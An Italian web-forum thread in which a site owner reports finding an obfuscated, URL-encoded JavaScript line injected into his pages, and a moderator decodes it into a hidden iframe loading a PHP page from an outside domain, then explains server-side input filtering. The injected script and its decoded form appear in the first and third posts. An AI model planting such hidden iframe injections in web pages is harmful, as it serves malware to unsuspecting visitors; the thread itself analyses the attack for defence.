Visualizzazione dei risultati da 1 a 7 su 7
  1. #1
    Utente di HTML.it L'avatar di dodo71
    Registrato dal
    Aug 2001
    Messaggi
    32

    Cosa potrebbe essere?

    Ciao raga, accedendo oggi, in un mio sito, mi compariva l'avviso dell'antivirus che mi bloccava un trojan horse, ed inoltre mi diceva che un controllo active x non era sicuro.

    Guardando il codice, ho trovato la presenza di questa riga:
    <script language=javascript>document.write(unescape('%3C%6 9%66%72%61%6D%65%20%73%72%63%3D"%68%74%74%70%3A%2F %2F%69%66%72%61%6D%65%73%69%74%65%2E%62%69%7A%2F%6 4%6C%2F%61%64%76%35%31%30%2E%70%68%70"%20%73%74%79 %6C%65%3D"%64%69%73%70%6C%61%79%3A%6E%6F%6E%65"%3E %3C%2F%69%66%72%61%6D%65%3E'));</script>

    Come c'è finita dentro, io non l'ho mai inserita, significa che qualcuno è riuscito a manomettere il codice, possibile?

    Ciao, Donatello.

  2. #2
    Utente di HTML.it
    Registrato dal
    Nov 2004
    Messaggi
    4
    Pare che nella giornara di ieri vi sia stato un tentativo di hackeraggio. E' un tipo di hackeraggio oramai conosciuto da diverso tempo (inserice una riga di javascript), che sfrutta le pagine vulnerabili di un sito.Si chiamano "Cross-Site Scripting (XSS)" dovuto esclusivamente alla programmazione del sito web.

  3. #3
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    in particolare la stringa decodificata crea nella pagina il seguente codice:

    codice:
    <iframe src="http://iframesite.biz/dl/adv510.php" style="display:none"></iframe>
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  4. #4
    Utente di HTML.it
    Registrato dal
    Jun 2005
    Messaggi
    415
    Ma scrivendo il codice dello script nel forum come hanno fatto dodo71 e habanero non c'è il rischio che il browser lo interpreti come script effettivo?

    In che modo è possibile decodificare lo script di dodo71?

  5. #5
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Originariamente inviato da Teo80
    Ma scrivendo il codice dello script nel forum come hanno fatto dodo71 e habanero non c'è il rischio che il browser lo interpreti come script effettivo?
    No perchè il forum è protetto da tentativi di Cross Site Scripting (XSS). E' buona pratica filtrare lato server tutto l'input immesso da un utente in modo che non venga interpretato dal browser ma stampato tale e quale. E' la base della sicurezza di tutti i siti basati su linguaggi lato server.

    Originariamente inviato da Teo80
    In che modo è possibile decodificare lo script di dodo71?
    puoi facilmente decodificare lo script modificandolo... basta sostiruire il document.write con un alert.
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  6. #6
    Utente di HTML.it
    Registrato dal
    Jun 2005
    Messaggi
    415
    Grazie.

    Scrivendo delle pagine php o asp o jsp, in che modo si possono evitare questi problemi in cui è incappato dodo71?

  7. #7
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.